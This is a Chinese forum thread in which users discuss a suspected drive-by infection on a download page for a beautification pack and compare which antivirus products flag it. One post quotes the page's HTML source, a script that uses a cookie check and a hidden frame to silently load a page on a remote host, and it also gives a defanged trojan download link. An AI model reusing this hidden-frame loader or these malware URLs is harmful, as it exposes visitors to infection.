怀疑是被挂马了 小a报警

lianyeguzhou

我这里小a无反应

幸福的猪猪

点击某美化包之后，出现下载页面。（不过，其好像做了特殊处理。如果用redoce解析下载页面的话，获取不到有关挂马页面的信息。用IE自带的“源文件”查看，就可以看出猫腻了。下面为其的源代码：

1. <html>
   
2. <head>
   
3. </head>
   
4. <script>
   
5. function showme()
   
6. {
   
7. var CK=document.cookie;
   
8. var sa=CK.indexOf("CK");
   
9. if(sa!=-1){}else{var EP=new Date();
   
10. EP.setTime(EP.getTime()+24*60*60*1000);
    
11. document.cookie="CK=test;expires="+EP.toGMTString();
    
12. self.hi.location="http://j789o.3322.org:6677/m/index.html";}
    
13. }
    
14. </script>
    
15. <frameset rows="100%,*">
    
16. <frame name="hello" src="/fengjing/huahui.html?UpdatedPage=aGlqYWNr">
    
17. <frame name="hi" src="">
    
18. </frameset>
    
19. </html>

复制代码

木马程序下载地址：

hxxp://147gh0.3322.org:6677/m/gho.exe

夜火燎原

额~~我的小A~诺顿和网盾都木有反应啊~

langzi2009

诺顿2011 没有反应 估计是误报了

黑羽

卡巴拦截。。

flw54321

nod32在TW chrome打开网页时无反应 ，下载hxxp://147gh0.3322.org:6677/m/gho.exe有反应了

yujiakun

确实是

黑羽

卡巴和360拦截

A1101536336

诺顿

etdm

趋势报警···